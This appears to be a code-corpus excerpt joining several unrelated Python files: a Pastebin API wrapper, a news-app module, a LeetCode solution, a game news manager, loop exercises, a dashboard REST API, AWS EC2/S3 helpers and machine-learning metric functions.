<paste_private>0</paste_private>
<paste_format_long>Python</paste_format_long>
<paste_format_short>python</paste_format_short>
<paste_url>http://pastebin.com/DLiSspYT</paste_url>
<paste_hits>70</paste_hits>
</paste>
Note: Returns multiple pastes, not just 1.
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type api_user_key: string
@param api_user_key: The API User Key of a U{http://pastebin.com} registered user.
@type results_limit: number
@param results_limit: The number of pastes to return between 1 - 1000.
@rtype: string
@returns: Returns an XML string containing number of specified pastes by user.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Requires pre-registered account
if api_user_key is not None:
argv['api_user_key'] = str(api_user_key)
# Number of results to return - between 1 & 1000, default = 50
if results_limit is None:
argv['api_results_limit'] = 50
if results_limit is not None:
if results_limit < 1:
argv['api_results_limit'] = 50
elif results_limit > 1000:
argv['api_results_limit'] = 1000
else:
argv['api_results_limit'] = int(results_limit)
        # Valid API option - 'list' returns the pastes of the given user
argv['api_option'] = str('list')
# lets try to read the URL that we've just built.
        request_string = urlopen(self._api_url, urlencode(argv).encode('utf-8'))
        response = request_string.read().decode('utf-8')
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith('<paste>'):
raise PastebinError(response)
return response
def generate_user_key(self, api_dev_key, username, password):
"""Generate a user session key - needed for other functions.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> my_key = x.generate_user_key('453a994e0e2f1efae07f8759e59e075b',
... 'MonkeyPuzzle',
... '12345678')
>>> print my_key
c57a18e6c0ae228cd4bd16fe36da381a
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type username: string
@param username: The username of a registered U{http://pastebin.com} account.
@type password: string
@param password: The password of a registered U{http://pastebin.com} account.
@rtype: string
@returns: Session key (api_user_key) to allow authenticated interaction to the API.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Requires pre-registered pastebin account
if username is not None:
argv['api_user_name'] = str(username)
# Requires pre-registered pastebin account
if password is not None:
argv['api_user_password'] = str(password)
# lets try to read the URL that we've just built.
        request_string = urlopen(self._api_login_url, urlencode(argv).encode('utf-8'))
        response = request_string.read().decode('utf-8')
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
return response
def paste(self, api_dev_key, api_paste_code,
api_user_key = None, paste_name = None, paste_format = None,
paste_private = None, paste_expire_date = None):
"""Submit a code snippet to Pastebin using the new API.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> url = x.paste('453a994e0e2f1efae07f8759e59e075b' ,
... 'Snippet of code to paste goes here',
... paste_name = 'title of paste',
... api_user_key = 'c57a18e6c0ae228cd4bd16fe36da381a',
... paste_format = 'python',
... paste_private = 'unlisted',
... paste_expire_date = '10M')
>>> print url
http://pastebin.com/tawPUgqY
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type api_paste_code: string
@param api_paste_code: The file or string to paste to body of the U{http://pastebin.com} paste.
@type api_user_key: string
@param api_user_key: The API User Key of a U{http://pastebin.com} registered user.
If none specified, paste is made as a guest.
@type paste_name: string
@param paste_name: (Optional) Title of the paste.
Default is to paste anonymously.
@type paste_format: string
@param paste_format: (Optional) Programming language of the code being
pasted. This enables syntax highlighting when reading the code in
U{http://pastebin.com}. Default is no syntax highlighting (text is
just text and not source code).
@type paste_private: string
@param paste_private: (Optional) C{'public'} if the paste is public (visible
by everyone), C{'unlisted'} if it's public but not searchable.
C{'private'} if the paste is private and not searchable or indexed.
The Pastebin FAQ (U{http://pastebin.com/faq}) claims
private pastes are not indexed by search engines (aka Google).
@type paste_expire_date: str
@param paste_expire_date: (Optional) Expiration date for the paste.
Once past this date the paste is deleted automatically. Valid
values are found in the L{PastebinAPI.paste_expire_date} class member.
If not provided, the paste never expires.
@rtype: string
@return: Returns the URL to the newly created paste.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Code snippet to submit
if api_paste_code is not None:
argv['api_paste_code'] = str(api_paste_code)
# Valid API option - 'paste' is default for new paste
argv['api_option'] = str('paste')
# API User Key
if api_user_key is not None:
argv['api_user_key'] = str(api_user_key)
elif api_user_key is None:
argv['api_user_key'] = str('')
# Name of the poster
if paste_name is not None:
argv['api_paste_name'] = str(paste_name)
# Syntax highlighting
if paste_format is not None:
paste_format = str(paste_format).strip().lower()
argv['api_paste_format'] = paste_format
# Is the snippet private?
if paste_private is not None:
if paste_private == 'public':
argv['api_paste_private'] = int(0)
elif paste_private == 'unlisted':
argv['api_paste_private'] = int(1)
elif paste_private == 'private':
argv['api_paste_private'] = int(2)
# Expiration for the snippet
if paste_expire_date is not None:
paste_expire_date = str(paste_expire_date).strip().upper()
argv['api_paste_expire_date'] = paste_expire_date
# lets try to read the URL that we've just built.
        request_string = urlopen(self._api_url, urlencode(argv).encode('utf-8'))
        response = request_string.read().decode('utf-8')
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith(self._prefix_url):
raise PastebinError(response)
return response
def legacy_paste(self, paste_code,
paste_name = None, paste_private = None,
paste_expire_date = None, paste_format = None):
"""Unofficial python interface to the Pastebin legacy API.
Unlike the official API, this one doesn't require an API key, so it's
virtually anonymous.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> url = x.legacy_paste('Snippet of code to paste goes here',
... paste_name = 'title of paste',
... paste_private = 'unlisted',
... paste_expire_date = '10M',
... paste_format = 'python')
>>> print url
http://pastebin.com/tawPUgqY
@type paste_code: string
@param paste_code: The file or string to paste to body of the U{http://pastebin.com} paste.
@type paste_name: string
@param paste_name: (Optional) Title of the paste.
Default is to paste with no title.
@type paste_private: string
@param paste_private: (Optional) C{'public'} if the paste is public (visible
by everyone), C{'unlisted'} if it's public but not searchable.
C{'private'} if the paste is private and not searchable or indexed.
The Pastebin FAQ (U{http://pastebin.com/faq}) claims
private pastes are not indexed by search engines (aka Google).
@type paste_expire_date: string
@param paste_expire_date: (Optional) Expiration date for the paste.
Once past this date the paste is deleted automatically. Valid
values are found in the L{PastebinAPI.paste_expire_date} class member.
If not provided, the paste never expires.
@type paste_format: string
@param paste_format: (Optional) Programming language of the code being
pasted. This enables syntax highlighting when reading the code in
U{http://pastebin.com}. Default is no syntax highlighting (text is
just text and not source code).
@rtype: string
@return: Returns the URL to the newly created paste.
"""
# Code snippet to submit
argv = { 'paste_code' : str(paste_code) }
# Name of the poster
if paste_name is not None:
argv['paste_name'] = str(paste_name)
        # Is the snippet private? (the legacy API expects 0 = public, 1 = private)
        if paste_private is not None:
            argv['paste_private'] = int(str(paste_private).strip().lower() == 'private')
# Expiration for the snippet
if paste_expire_date is not None:
paste_expire_date = str(paste_expire_date).strip().upper()
argv['paste_expire_date'] = paste_expire_date
# Syntax highlighting
if paste_format is not None:
paste_format = str(paste_format).strip().lower()
argv['paste_format'] = paste_format
# lets try to read the URL that we've just built.
        request_string = urlopen(self._legacy_api_url, urlencode(argv).encode('utf-8'))
        response = request_string.read().decode('utf-8')
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith(self._prefix_url):
raise PastebinError(response)
return response
######################################################
delete_paste = PastebinAPI.delete_paste
user_details = PastebinAPI.user_details
trending = PastebinAPI.trending
pastes_by_user = PastebinAPI.pastes_by_user
generate_user_key = PastebinAPI.generate_user_key
legacy_paste = PastebinAPI.legacy_paste
paste = PastebinAPI.paste
######################################################
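# Usage sketch (an illustration added for clarity, not part of the original
# module): the module-level names above come straight from the class, so they
# still expect a PastebinAPI instance as their first argument. Instantiating
# the class directly is the simpler pattern:
#
#   api = PastebinAPI()
#   url = api.legacy_paste('print("hello")',
#                          paste_name='demo',
#                          paste_format='python')
#   print(url)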
if __name__ == "__main__":
main()
| 1.726563 | 2 |
app/requests.py | seron-ux/News-app | 1 | 6840 | <gh_stars>1-10
import urllib.request,json
from .models import News
import requests
News = News
# Getting api key
api_key = None
# Getting the news base url
base_url = None
base_url2 = None
def configure_request(app):
global api_key,base_url,base_url2
api_key = app.config['NEWS_API_KEY']
base_url = app.config['NEWS_API_BASE_URL']
base_url2 = app.config['ARTICLE_API_BASE_URL']
def get_news(category):
'''
Function that gets the json responce to our url request
'''
get_news_url = base_url.format(category,api_key)
print(get_news_url)
get_news_response = requests.get(get_news_url).json()
print(get_news_response)
news_results = None
if get_news_response['articles']:
news_results_list = get_news_response['articles']
news_results = process_results(news_results_list)
return news_results
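# Usage sketch (assumes configure_request() has been called with a Flask app
# whose config defines NEWS_API_KEY and NEWS_API_BASE_URL; 'business' is just an
# example category, and the attribute names follow the News(...) constructor
# arguments used in process_results() below):
#
#   business_news = get_news('business')
#   for item in business_news or []:
#       print(item.title, item.article)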
def search_news(news_name):
search_news_url = 'https://api.thenewsdb.org/3/search/news?api_key={}&query={}'.format(api_key,news_name)
search_news_response = requests.get(search_news_url).json()
search_news_results = None
if search_news_response['results']:
search_news_list = search_news_response['results']
search_news_results = process_results(search_news_list)
return search_news_results
def process_results(news_list):
'''
Function that processes the news result and transform them to a list of Objects
Args:
news_list: A list of dictionaries that contain news details
Returns :
news_results: A list of news objects
'''
news_results = []
for news_item in news_list:
title = news_item.get('title')
image = news_item.get('urlToImage')
description = news_item.get('description')
date = news_item.get('publishedAt')
article = news_item.get('url')
if image:
news_object = News(title,image,description,date,article)
news_results.append(news_object)
return news_results
def get_article(source):
'''
Function that gets the json responce to our url request
'''
get_news_url = base_url.format(source,api_key)
with urllib.request.urlopen(get_news_url) as url:
get_news_data = url.read()
get_news_response = json.loads(get_news_data)
news_results = None
if get_news_response['articles']:
news_results_list = get_news_response['articles']
news_results = process_results(news_results_list)
return news_results
| 2.9375 | 3 |
leetcode/151_reverse _words_in_a_string.py | caoxudong/code_practice | 1 | 6841 | """
Given an input string, reverse the string word by word.
For example,
Given s = "the sky is blue",
return "blue is sky the".
For C programmers: Try to solve it in-place in O(1) space.
Clarification:
* What constitutes a word?
A sequence of non-space characters constitutes a word.
* Could the input string contain leading or trailing spaces?
Yes. However, your reversed string should not contain leading or trailing spaces.
* How about multiple spaces between two words?
Reduce them to a single space in the reversed string.
https://leetcode.com/problems/reverse-words-in-a-string/
"""
class Solution:
# @param s, a string
# @return a string
def reverseWords(self, s):
elements = s.split(" ")
elements = [x for x in elements if x != ""]
elements = elements[::-1]
return " ".join(elements) | 4.03125 | 4 |
toontown/uberdog/DistributedInGameNewsMgr.py | LittleNed/toontown-stride | 3 | 6842 | import socket, datetime, os
from direct.distributed.DistributedObjectGlobal import DistributedObjectGlobal
from direct.distributed.DistributedObject import DistributedObject
from toontown.toonbase import ToontownGlobals
from toontown.uberdog import InGameNewsResponses
from direct.directnotify.DirectNotifyGlobal import directNotify
class DistributedInGameNewsMgr(DistributedObject):
notify = directNotify.newCategory('InGameNewsMgr')
neverDisable = 1
def __init__(self, cr):
DistributedObject.__init__(self, cr)
base.cr.inGameNewsMgr = self
def delete(self):
DistributedObject.delete(self)
self.cr.inGameNewsMgr = None
return
def disable(self):
self.notify.debug("i'm disabling InGameNewsMgr rightnow.")
DistributedObject.disable(self)
def generate(self):
self.notify.debug('BASE: generate')
DistributedObject.generate(self)
def setLatestIssueStr(self, issueStr):
self.latestIssueStr = issueStr
self.latestIssue = base.cr.toontownTimeManager.convertUtcStrToToontownTime(issueStr)
messenger.send('newIssueOut')
self.notify.info('latestIssue=%s' % self.latestIssue)
def getLatestIssueStr(self):
pass
def getLatestIssue(self):
return self.latestIssue
| 2.140625 | 2 |
Day10/loops.py | azeemchaudhrry/30DaysofPython | 0 | 6843 | <filename>Day10/loops.py
# Day 10 Loops
from countries import *
# While Loop
# count = 0
# while count < 5:
# if count == 3:
# break
# print(count)
# count = count + 1
# numbers = [0,2,3,4,5,6,7,8,9,10]
# for number in numbers:
# print(number)
# language = 'Python'
# for letter in language:
# print(letter)
# tpl = ('python','updates','wow')
# for number in tpl:
# print(number)
# person = {
# 'first_name':'Asabeneh',
# 'last_name':'Yetayeh',
# 'age':250,
# 'country':'Finland',
# 'is_marred':True,
# 'skills':['JavaScript', 'React', 'Node', 'MongoDB', 'Python'],
# 'address':{
# 'street':'Space street',
# 'zipcode':'02210'
# }
# }
# print('------------------------------------')
# for key in person:
# print(key)
# print('------------------------------------')
# for key,value in person.items():
# print(key, value)
# print('--------------------------------------')
# it_companies = {'Facebook', 'Google', 'Microsoft', 'Apple', 'IBM', 'Oracle', 'Amazon'}
# for company in it_companies:
# print(company)
# print('--------------------------------------')
# numbers = (0,1,2,3,4,5,6,7)
# for number in numbers:
# print(number)
# if(number == 3):
# break
# print('--------------------------------------')
# for number in numbers:
# print(number)
# if(number == 3):
# continue
# print('--------------------------------------')
# numbers = (0,1,2,3,4,5)
# for number in numbers:
# print(number)
# if number == 3:
# continue
# print('Next number should be ', number + 1) if number != 5 else print("loop's end") # for short hand conditions need both if and else statements
# print('outside the loop')
# print('--------------------------------------')
# lst = list(range(11))
# print(lst)
# st = set(range(1,11))
# print(st)
# lst = list(range(0,11,2))
# print(lst)
# st = set(range(0,11,2))
# print(st)
# Exercises: Day 10
# Iterate 0 to 10 using for loop, do the same using while loop.
# numbers = [0,1,2,3,4,5,6,7,8,9,10]
# for number in numbers:
# print(number)
# count = 0
# while count < 10:
# print(count)
# count += 1
# Iterate 10 to 0 using for loop, do the same using while loop.
# for number in range(10,-1,-1):
# print(number)
# count = 10
# while count > -1:
# print(count)
# count -= 1
# Write a loop that makes seven calls to print(), so we get on the output the following triangle:
for index in range(1, 8):
    print(index * '#')
limit = 9
for i in range(0,limit):
for j in range(0,limit):
print('# ', end='')
print('')
for i in range(0, 11):
print(f'{i} x {i} = {i * i}')
frameworks = ['Python', 'Numpy','Pandas','Django', 'Flask']
for framework in frameworks:
print(framework)
for i in range(0,101):
if i % 2 == 0:
print(i)
for i in range(0,101):
if i % 2 != 0:
print(i)
sum = 0
for i in range(0,101):
sum += i
print('The sum of all numbers is : ', sum)
even_sum = odd_sum = 0
for i in range(0,101):
if i % 2 == 0:
even_sum += i
elif i % 2 != 0:
odd_sum += i
print(f'The sum of all evens is {even_sum}. And the sum of all odds is {odd_sum}.')
for country in countries:
if 'land' in country:
print(country)
fruits = ['banana', 'orange', 'mango', 'lemon']
total_elements = len(fruits) - 1
for i in range(0, int(len(fruits) / 2)):
temp_element = fruits[i]
fruits[i] = fruits[total_elements - i]
fruits[total_elements - i] = temp_element
print(fruits) | 3.828125 | 4 |
tessera-server/tessera/views_api.py | Dimas625/tessera | 379 | 6844 | <reponame>Dimas625/tessera<filename>tessera-server/tessera/views_api.py
# -*- mode:python -*-
import flask
import json
import logging
from datetime import datetime
import inflection
from functools import wraps
from flask import request, url_for
from werkzeug.exceptions import HTTPException
from .client.api.model import *
from . import database
from . import helpers
from .application import db
mgr = database.DatabaseManager(db)
log = logging.getLogger(__name__)
api = flask.Blueprint('api', __name__)
# =============================================================================
# API Helpers
# =============================================================================
def route_api(application, *args, **kwargs):
def decorator(fn):
@application.route(*args, **kwargs)
@wraps(fn)
def wrapper(*args, **kwargs):
headers = None
status_code = 200
try:
value = fn(*args, **kwargs)
except HTTPException as e:
raise helpers.set_exception_response(e)
if isinstance(value, tuple):
if len(value) > 2:
headers = value[2]
status_code = value[1]
value = value[0]
return helpers.jsonify(value, status_code, headers)
return fn
return decorator
def _dashboard_sort_column():
"""Return a SQLAlchemy column descriptor to sort results by, based on
the 'sort' and 'order' request parameters.
"""
columns = {
'created' : database.DashboardRecord.creation_date,
'modified' : database.DashboardRecord.last_modified_date,
'category' : database.DashboardRecord.category,
'id' : database.DashboardRecord.id,
'title' : database.DashboardRecord.title
}
colname = helpers.get_param('sort', 'created')
order = helpers.get_param('order')
column = database.DashboardRecord.creation_date
if colname in columns:
column = columns[colname]
if order == 'desc' or order == u'desc':
return column.desc()
else:
return column.asc()
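# For example (a sketch), GET /api/dashboard/?sort=title&order=desc lists
# dashboards by title in descending order; with no parameters the listing falls
# back to creation date, ascending.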
def _set_dashboard_hrefs(dash):
"""Add the various ReSTful hrefs to an outgoing dashboard
representation. dash should be the dictionary for of the dashboard,
not the model object.
"""
id = dash['id']
dash['href'] = url_for('api.dashboard_get', id=id)
dash['definition_href'] = url_for('api.dashboard_get_definition', id=id)
dash['view_href'] = url_for('ui.dashboard_with_slug',
id=id,
slug=inflection.parameterize(dash['title']))
if 'definition' in dash:
definition = dash['definition']
definition['href'] = url_for('api.dashboard_get_definition', id=id)
return dash
def _dashboards_response(dashboards):
"""Return a Flask response object for a list of dashboards in API
format. dashboards must be a list of dashboard model objects, which
will be converted to their JSON representation.
"""
if not isinstance(dashboards, list):
dashboards = [dashboards]
include_definition = helpers.get_param_boolean('definition', False)
return [ _set_dashboard_hrefs(d.to_json(include_definition=include_definition)) for d in dashboards]
def _set_tag_hrefs(tag):
"""Add ReSTful href attributes to a tag's dictionary
representation.
"""
id = tag['id']
tag['href'] = url_for('api.tag_get', id=id)
return tag
def _tags_response(tags):
"""Return a Flask response object for a list of tags in API
format. tags must be a list of tag model objects, which
will be converted to their JSON representation.
"""
if not isinstance(tags, list):
tags = [tags]
return [_set_tag_hrefs(t.to_json()) for t in tags]
# =============================================================================
# Dashboards
# =============================================================================
@route_api(api, '/dashboard/')
def dashboard_list():
"""Listing for all dashboards. Returns just the metadata, not the
definitions.
"""
imported_from = request.args.get('imported_from')
if imported_from:
query = database.DashboardRecord.query.filter_by(imported_from=imported_from) \
.order_by(_dashboard_sort_column())
else:
query = database.DashboardRecord.query.order_by(_dashboard_sort_column())
dashboards = [d for d in query.all()]
return _dashboards_response(dashboards)
@route_api(api, '/dashboard/tagged/<tag>')
def dashboard_list_tagged(tag):
"""Listing for a set of dashboards with a tag applied. Returns just
the metadata, not the definitions.
"""
tag = database.TagRecord.query.filter_by(name=tag).first()
if not tag:
return _dashboards_response([])
dashboards = [d for d in tag.dashboards.order_by(_dashboard_sort_column()) if tag]
return _dashboards_response(dashboards)
@route_api(api, '/dashboard/category/<category>')
def dashboard_list_dashboards_in_category(category):
"""Listing for a set of dashboards in a specified category. Returns
just the metadata, not the definitions.
"""
dashboards = [d for d in database.DashboardRecord.query
.filter_by(category=category)
.order_by(_dashboard_sort_column()) ]
return _dashboards_response(dashboards)
@route_api(api, '/dashboard/category/')
def dashboard_list_all_dashboard_categories():
result = db.session.query(
database.DashboardRecord.category,
db.func.count(database.DashboardRecord.category)
).group_by(database.DashboardRecord.category).all()
categories = []
for (name, count) in result:
categories.append({
'name' : name,
'count' : count,
})
return categories
@route_api(api, '/dashboard/<id>')
def dashboard_get(id):
"""Get the metadata for a single dashboard.
"""
dashboard = database.DashboardRecord.query.get_or_404(id)
rendering = helpers.get_param('rendering', False)
include_definition = helpers.get_param_boolean('definition', False)
dash = _set_dashboard_hrefs(dashboard.to_json(rendering or include_definition))
if rendering:
dash['preferences'] = helpers.get_preferences()
return dash
@route_api(api, '/dashboard/<id>/for-rendering')
def dashboard_get_for_rendering(id):
"""Get a dashboard with its definition, and current settings necessary
for rendering.
"""
dashboard = database.DashboardRecord.query.get_or_404(id)
dash = _set_dashboard_hrefs(dashboard.to_json(True))
return {
'dashboard' : dash,
'preferences' : helpers.get_preferences()
}
@route_api(api, '/dashboard/', methods=['POST'])
def dashboard_create():
"""Create a new dashboard with an empty definition.
"""
dashboard = database.DashboardRecord.from_json(request.json)
if not dashboard.title:
return {
'error_message': "Missing required field 'title'"
}, 400
if 'definition' in request.json:
dashboard.definition = database.DefinitionRecord(dumps(request.json['definition']))
else:
dashboard.definition = database.DefinitionRecord(dumps(DashboardDefinition()))
mgr.store_dashboard(dashboard)
href = url_for('api.dashboard_get', id=dashboard.id)
return {
'dashboard_href' : href,
'view_href' : url_for('ui.dashboard_with_slug',
id=dashboard.id,
slug=inflection.parameterize(dashboard.title))
}, 201, { 'Location' : href }
@route_api(api, '/dashboard/<id>', methods=['PUT'])
def dashboard_update(id):
"""Update the metadata for an existing dashboard.
"""
body = request.json
dashboard = database.DashboardRecord.query.get_or_404(id)
dashboard.merge_from_json(body)
mgr.store_dashboard(dashboard)
# TODO - return similar to create, above
return {}
@route_api(api, '/dashboard/<id>', methods=['DELETE'])
def dashboard_delete(id):
"""Delete a dashboard. Use with caution.
"""
dashboard = database.DashboardRecord.query.get_or_404(id)
db.session.delete(dashboard)
db.session.commit()
return {}, 204
@route_api(api, '/dashboard/<id>/definition')
def dashboard_get_definition(id):
"""Fetch the definition for a dashboard. This returns the
representation to use when modifiying a dashboard.
"""
dashboard = database.DashboardRecord.query.filter_by(id=id)[0]
definition = database.DashboardRecord.query.get_or_404(id).definition.to_json()
definition['href'] = url_for('api.dashboard_get_definition', id=id)
definition['dashboard_href'] = url_for('api.dashboard_get', id=id)
return definition
@route_api(api, '/dashboard/<id>/definition', methods=['PUT'])
def dashboard_update_definition(id):
"""Update the definition of the dashboard. This should use the
representation returned by /api/dashboard/<id>/definition, and
should NOT have any embedded variables expanded, nor should it
have complete graphite URLs in the queries.
"""
dashboard = database.DashboardRecord.query.get_or_404(id)
# Validate the payload
definition = DashboardDefinition.from_json(json.loads(request.data.decode('utf-8')))
if dashboard.definition:
dashboard.definition.definition = dumps(definition)
else:
dashboard.definition = database.DashboardRecordDef(request.data)
mgr.store_dashboard(dashboard)
return {}
# =============================================================================
# Tags
# =============================================================================
@route_api(api, '/tag/')
def tag_list():
"""Listing for all tags.
"""
tags = db.session.query(database.TagRecord).all()
return _tags_response(tags)
@route_api(api, '/tag/<id>')
def tag_get(id):
tag = database.TagRecord.query.get_or_404(id)
return _tags_response(tag)
# =============================================================================
# Miscellany
# =============================================================================
@route_api(api, '/preferences/')
def preferences_get():
return helpers.get_preferences()
@route_api(api, '/preferences/', methods=['PUT'])
def preferences_put():
helpers.set_preferences(request.json)
return helpers.get_preferences()
| 2.1875 | 2 |
modules/aws_service.py | Darkcybe/attack_range | 1 | 6845 | <gh_stars>1-10
import sys
import re
import boto3
from botocore.exceptions import ClientError
import uuid
import time
import yaml
import os
import logging

log = logging.getLogger(__name__)
def get_instance_by_name(ec2_name, config):
instances = get_all_instances(config)
for instance in instances:
str = instance['Tags'][0]['Value']
if str == ec2_name:
return instance
def get_single_instance_public_ip(ec2_name, config):
instance = get_instance_by_name(ec2_name, config)
return instance['NetworkInterfaces'][0]['Association']['PublicIp']
def get_all_instances(config):
key_name = config['key_name']
region = config['region']
client = boto3.client('ec2', region_name=region)
response = client.describe_instances(
Filters=[
{
'Name': "key-name",
'Values': [key_name]
}
]
)
instances = []
for reservation in response['Reservations']:
for instance in reservation['Instances']:
if instance['State']['Name']!='terminated':
if len(instance['Tags']) > 0:
str = instance['Tags'][0]['Value']
if str.startswith(config['range_name'] + '-attack-range'):
instances.append(instance)
return instances
def get_splunk_instance_ip(config):
all_instances = get_all_instances(config)
for instance in all_instances:
instance_tag = config['range_name'] + '-attack-range-splunk-server'
if instance['Tags'][0]['Value'] == instance_tag:
return instance['NetworkInterfaces'][0]['PrivateIpAddresses'][0]['Association']['PublicIp']
def check_ec2_instance_state(ec2_name, state, config):
instance = get_instance_by_name(ec2_name, config)
if not instance:
log.error(ec2_name + ' not found as AWS EC2 instance.')
sys.exit(1)
return (instance['State']['Name'] == state)
def change_ec2_state(instances, new_state, log, config):
region = config['region']
client = boto3.client('ec2', region_name=region)
if len(instances) == 0:
        log.error('No AWS EC2 instances found to change state for.')
sys.exit(1)
if new_state == 'stopped':
for instance in instances:
if instance['State']['Name'] == 'running':
response = client.stop_instances(
InstanceIds=[instance['InstanceId']]
)
log.info('Successfully stopped instance with ID ' +
instance['InstanceId'] + ' .')
elif new_state == 'running':
for instance in instances:
if instance['State']['Name'] == 'stopped':
response = client.start_instances(
InstanceIds=[instance['InstanceId']]
)
log.info('Successfully started instance with ID ' + instance['InstanceId'] + ' .')
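# Usage sketch (assumes a config dict providing 'key_name', 'region' and
# 'range_name' as the functions above expect, plus a standard logging.Logger):
#
#   instances = get_all_instances(config)
#   change_ec2_state(instances, 'stopped', log, config)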
# def upload_file_s3_bucket(file_name, results, test_file, isArchive):
# region = config['region']
# s3_client = boto3.client('s3', region_name=region)
# if isArchive:
# response = s3_client.upload_file(file_name, 'attack-range-attack-data', str(test_file['simulation_technique'] + '/attack_data.tar.gz'))
# else:
# response = s3_client.upload_file(file_name, 'attack-range-attack-data', str(test_file['simulation_technique'] + '/attack_data.json'))
#
# with open('tmp/test_results.yml', 'w') as f:
# yaml.dump(results, f)
# response2 = s3_client.upload_file('tmp/test_results.yml', 'attack-range-automated-testing', str(test_file['simulation_technique'] + '/test_results.yml'))
# os.remove('tmp/test_results.yml')
def upload_file_s3_bucket(s3_bucket, file_path, S3_file_path, config):
region = config['region']
s3_client = boto3.client('s3', region_name=region)
response = s3_client.upload_file(file_path, s3_bucket, S3_file_path)
def upload_test_results_s3_bucket(s3_bucket, test_file, test_result_file_path, config):
region = config['region']
s3_client = boto3.client('s3', region_name=region)
response = s3_client.upload_file(test_result_file_path, s3_bucket, str(test_file['simulation_technique'] + '/test_results.yml'))
| 2.3125 | 2 |
pystacknet/metrics.py | KevinMichaelSchindler/pystacknet | 0 | 6846 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 31 18:33:58 2018
@author: <NAME>
metrics and method to check metrics used within StackNet
"""
from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score , mean_squared_log_error #regression metrics
from sklearn.metrics import roc_auc_score, log_loss ,accuracy_score, f1_score ,matthews_corrcoef
import numpy as np
valid_regression_metrics=["rmse","mae","rmsle","r2","mape","smape"]
valid_classification_metrics=["auc","logloss","accuracy","f1","matthews"]
############ classification metrics ############
def auc(y_true, y_pred, sample_weight=None):
return roc_auc_score(y_true, y_pred, sample_weight=sample_weight)
def logloss(y_true, y_pred, sample_weight=None, labels = None):
return log_loss(y_true, y_pred, sample_weight=sample_weight, labels = labels)
def accuracy(y_true, y_pred, sample_weight=None):
return accuracy_score(y_true, y_pred, sample_weight=sample_weight)
def f1(y_true, y_pred, sample_weight=None):
return f1_score(y_true, y_pred, sample_weight=sample_weight)
def matthews(y_true, y_pred, sample_weight=None):
return matthews_corrcoef(y_true, y_pred, sample_weight=sample_weight)
############ regression metrics ############
def rmse(y_true, y_pred, sample_weight=None):
return np.sqrt(mean_squared_error(y_true, y_pred, sample_weight=sample_weight))
def mae(y_true, y_pred, sample_weight=None):
return mean_absolute_error(y_true, y_pred, sample_weight=sample_weight)
def rmsle (y_true, y_pred, sample_weight=None):
return np.sqrt(mean_squared_log_error(y_true, y_pred, sample_weight=sample_weight))
def r2(y_true, y_pred, sample_weight=None):
return r2_score(y_true, y_pred, sample_weight=sample_weight)
def mape(y_true, y_pred, sample_weight=None):
y_true = y_true.ravel()
y_pred = y_pred.ravel()
if sample_weight is not None:
sample_weight = sample_weight.ravel()
eps = 1E-15
ape = np.abs((y_true - y_pred) / (y_true + eps)) * 100
ape[y_true == 0] = 0
return np.average(ape, weights=sample_weight)
def smape(y_true, y_pred, sample_weight=None):
y_true = y_true.ravel()
y_pred = y_pred.ravel()
if sample_weight is not None:
sample_weight = sample_weight.ravel()
eps = 1E-15
sape = (np.abs(y_true - y_pred) / (0.5 * (np.abs(y_true) + np.abs(y_pred)) + eps)) * 100
sape[(y_true == 0) & (y_pred == 0)] = 0
return np.average(sape, weights=sample_weight)
"""
metric: string or class that returns a metric given (y_true, y_pred, sample_weight=None)
Currently supported regression metrics are "rmse","mae","rmsle","r2","mape","smape"
"""
def check_regression_metric(metric):
if type(metric) is type(None):
raise Exception ("metric cannot be None")
if isinstance(metric, str) :
if metric not in valid_regression_metrics:
raise Exception ("The regression metric has to be one of %s " % (", ".join([str(k) for k in valid_regression_metrics])))
if metric=="rmse":
return rmse,metric
elif metric=="mae":
return mae,metric
elif metric=="rmsle":
return rmsle,metric
elif metric=="r2":
return r2,metric
elif metric=="mape":
return mape,metric
elif metric=="smape":
return smape,metric
else :
raise Exception ("The metric %s is not recognised " % (metric) )
else : #customer metrics is given
try:
y_true_temp=[[1],[2],[3]]
y_pred_temp=[[2],[1],[3]]
y_true_temp=np.array(y_true_temp)
y_pred_temp=np.array(y_pred_temp)
sample_weight_temp=[1,0.5,1]
metric(y_true_temp,y_pred_temp, sample_weight=sample_weight_temp )
return metric,"custom"
except:
raise Exception ("The custom metric has to implement metric(y_true, y_pred, sample_weight=None)" )
"""
metric: string or class that returns a metric given (y_true, y_pred, sample_weight=None)
Currently supported classification metrics are "auc","logloss","accuracy","f1","matthews"
"""
def check_classification_metric(metric):
if type(metric) is type(None):
raise Exception ("metric cannot be None")
if isinstance(metric, str) :
if metric not in valid_classification_metrics:
raise Exception ("The classification metric has to be one of %s " % (", ".join([str(k) for k in valid_classification_metrics])))
if metric=="auc":
return auc,metric
elif metric=="logloss":
return logloss,metric
elif metric=="accuracy":
return accuracy,metric
elif metric=="r2":
return r2,metric
elif metric=="f1":
return f1,metric
elif metric=="matthews":
return matthews,metric
else :
raise Exception ("The metric %s is not recognised " % (metric) )
else : #customer metrics is given
try:
y_true_temp=[[1],[0],[1]]
y_pred_temp=[[0.4],[1],[0.2]]
y_true_temp=np.array(y_true_temp)
y_pred_temp=np.array(y_pred_temp)
sample_weight_temp=[1,0.5,1]
metric(y_true_temp,y_pred_temp, sample_weight=sample_weight_temp )
return metric,"custom"
except:
raise Exception ("The custom metric has to implement metric(y_true, y_pred, sample_weight=None)" )
| 2.40625 | 2 |
